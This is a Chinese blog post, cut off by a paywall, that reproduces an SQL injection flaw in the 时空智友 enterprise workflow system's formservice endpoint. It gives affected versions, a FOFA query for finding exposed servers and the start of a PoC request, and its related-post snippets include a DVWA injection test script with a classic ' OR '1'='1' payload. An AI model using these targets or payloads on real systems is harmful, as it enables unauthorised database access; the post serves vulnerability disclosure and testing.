时空智友企业流程化管控系统formserviceSQL注入漏洞(含批量验证poc)

已于 2024-04-17 16:28:04 修改
阅读量75 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络
于 2024-04-17 16:27:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137878191
版权

漏洞描述

时空智友企业流程化管控系统是一款企业信息管理软件,致力于协助大健康企业构建内部信息化,解决GSP管理、多组织管理、财务管理、税控管理、线上线下一体化等问题。 该系统可以帮助企业实现流程化管控,提高工作效率和管理水平。
目前该系统存在sql注入漏洞,攻击者通过恶意构造的SQL查询来执行未经授权的数据库操作。当应用程序未能正确验证、转义或过滤用户提供的输入数据时,攻击者可以利用这个漏洞来执行恶意的SQL语句,从而获取系统数据以及获得系统控制权限。

漏洞影响版本

版本<=11.0
FOFA:body=”企业流程化管控系统” && body=”密码(Password):”

漏洞复现

1.访问存在漏洞的网站,抓包
 


漏洞验证poc

POST /formservice?service=workflow.sqlResult HTTP/1.1
Host:xx.xx.xx.xx:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Content-Type: application/json
Accept-
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
【1day】复现空智企业流程化控系统任意信息泄露漏洞
记录并分享学习安全的知识点..
11-02 227
空智企业流程化控系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化,从而提高工作效率、降低成本并提升管理水平。空智企业流程化控系统存在任意文件读取漏洞,攻击者攻击者可以在未经授权的情况下读取系统上的任意文件。空智企业流程化控系统存在任意信息泄露漏洞,可根据泄露信息,伪造用户进行登录。
【0day】复现空智企业流程化控系统SQL注入漏洞
记录并分享学习安全的知识点..
08-24 746
空智企业流程化控系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化,从而提高工作效率、降低成本并提升管理水平。空智企业流程化控系统存在SQL注入漏洞,攻击者通过恶意构造的SQL查询来执行未经授权的数据库操作。当应用程序未能正确验证、转义或过滤用户提供的输入数据,攻击者可以利用这个漏洞来执行恶意的SQL语句,从而绕过应用程序的访问控制和执行非法操作。
空智企业流程化控系统文件上传漏洞复现
0xSec
08-22 2644
空智企业流程化控系统 formservice接口处存在任意文件上传漏洞,未经认证的攻击者可通过此接口上传后门文件,最终可导致服务器失陷。
空智企业信息管理系统 SQL注入漏洞复现
09-19 861
空智企业流程化控系统是一款企业信息管理软件,致力于协助大健康企业构建内部信息化,解决GSP管理、多组织管理、财务管理、税控管理、线上线下一体化等问题。该系统可以帮助企业实现流程化管控,提高工作效率和管理水平。
Spring Cloud Function SpEL表达式注入漏洞poc验证
weixin_42016744的博客
03-30 5223
spring cloud曝出核弹级漏洞,利用十分简单,在java9以上的spring上通杀,预计影响不亚于去年的log4j漏洞。目前还无CVE编号
CNVD-2023-08743:宏景HCM SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
11-07 1577
宏景HCM系统 categories处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
致远OA敏感信息泄露漏洞合集(批量检测POC)
今天是几号的博客
03-21 7034
致远OA协同管理软件为企事业组织提供了一个协同办公门户和管理平台,涵盖了组织运营涉及的协作管理、审批管理、资源管理、知识管理、文化管理、公文管理等内容,支持企事业组织的信息化扩展应用,能有效帮助组织解决战略落地、文化建设、规范管理、资源整合、运营管控等难题,是组织管理的最佳实践。产品系列: A3、A6、A8品牌: 用对象: 微型、小型企业企业部门级。
致远OA SQL&任意文件下载漏洞(批量检测POC)
今天是几号的博客
03-21 2616
通过信息收集,查出web根目录D:/UFseeyon/OA/tomcat/webapps/yyoa,通过 into outfile 写入文件,这里因为 jsp木马存在特殊符号,使用 hex编码 上传允许文件上传的jsp文件。致远OA webmail.do文件读取漏洞,由于/seeyon/webmail.do 页面 filePath 参数过滤不严,导致可以读取系统敏感文件。致远OA A6 test.jsp 存在sql注入漏洞,并可以通过注入写入webshell文件控制服务器。app=“致远互联-OA”
致远OA文件上传漏洞(批量检测POC)
今天是几号的博客
03-21 9407
由于致远OA旧版本某些接口存在未授权访问,以及部分函数存在过滤不足,攻击者通过构造恶意请求,可在无需登录的情况下上传恶意脚本文件,从而控制服务器。致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3。致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1)致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3。致远OA G6、G6N (V8.1、V8.1SP1)。致远OA V6.0、V6.1SP1、V6.1SP2。致远OA V7.1、V7.1SP1。
空KSOA SQL注入漏洞复现
0xSec
08-13 2388
空KSOA /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet接口和/servlet/imagefield接口处存在sql注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
NACOS身份认证绕过漏洞批量检测poc.7z
02-24
NACOS身份认证绕过漏洞批量检测poc.7z
Python网页OA系统POC漏洞检测系统,框架FLask + python + OAPOC payload
07-19
Python网页OA系统POC漏洞检测系统 框架FLask + python + OAPOC payload 角色介绍 管理员 admin 123456 模块介绍 登录模块 首页模块 OA安全检测子模块(支持多个url或者单个url检测,调用payload并在界面回馈检测...
天翼2024SQL注入漏洞poc
02-27
天翼2024SQL注入漏洞poc
中国联通总部信息化软件POC验证测试管理规范_POC测试_
10-03
中国联通总部信息化软件POC验证测试管理规范
linux系统安全及应用
最新发布
Alone8046的博客
05-30 243
一、新的服务器到手该如何部署:1.配置IP地址,网关,dns解析,内外网。3.磁盘分区:lvm及raid。二、应用:1.不需要或者不想登录的用户设置为nologin:usermod -s nologin +用户。解锁文件:chattr -i /etc/passwd。提供了一种标准的身份认证的接口(对账号权限进行控制),可以允许管理员定制化配置各种认证方式和方法。(配置的候一定要注意:有限放开原则,用什么给什么,不需要的不加)会话管理模块:管理用户的会话,记录会话信息,注销用户的会话,远程终端连接。
Linux防火墙(以iptables为例)
Tassel_YUE的博客
05-28 937
防火墙是一种网络安全设备,用于监视和控制网络数据流量。其主要功能是在不同网络之间建立一条阻隔,对进出的数据流量进行过滤和筛选,从而保护内部网络免受未经授权的访问和恶意攻击。防火墙通过规则集合控制网络流量的通过与阻止,这些规则可以根据网络策略和需求进行配置。不正确的配置可能导致无法访问特定服务或应用程序。
【竞赛】本科阶段部分证书考试 & 科研竞赛 的 网站导航(算法、项目、安全、数据、科研)
小哈里的博客
05-28 974
【竞赛】本科阶段部分证书考试 & 科研竞赛 的 网站导航(算法、项目、安全、数据、科研) 文章目录 1、算法竞赛(重点) PAT/CSP 天梯赛/蓝桥/力扣 ICPC 算法竞赛 编程工具 代码源 其他 2、项目竞赛 安全与数据(重点) 项目竞赛官网 & 学习资料(独立) 网络安全 & CTF导航(独立) 项目+1(独立) 科研成果(独立) 3、其他补充 党团相关 不挂科 证书考试 零零碎碎 更多
编写一个能够验证dvwasql注入漏洞poc
07-13
我可以帮你提供一个简单的示例代码来验证 DVWA(Damn Vulnerable Web Application)中的 SQL 注入漏洞。请注意,这个示例仅用于教育目的,不要在未经授权的情况下使用它。 ``` import requests def check_sql_injection_vulnerability(url): payload = "' OR '1'='1' -- " response = requests.get(url + "?id=" + payload) if "Error" in response.text: print("该网站存在 SQL 注入漏洞!") else: print("该网站不存在 SQL 注入漏洞。") # 在这里替换为你的 DVWA 网站的 URL dvwa_url = "http://example.com/dvwa/vulnerabilities/sqli/" check_sql_injection_vulnerability(dvwa_url) ``` 请确保替换 `dvwa_url` 变量为你自己的 DVWA 网站的 URL,然后运行代码。如果输出显示该网站存在 SQL 注入漏洞,则说明你的 DVWA 配置存在问题,需要进行修复。 请记住,这只是一个简单的示例,实际的 SQL 注入漏洞检测可能需要更复杂的测试方法和技术。在进行任何安全测试之前,请确保遵守法律和道德准则,并获得适当的授权。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值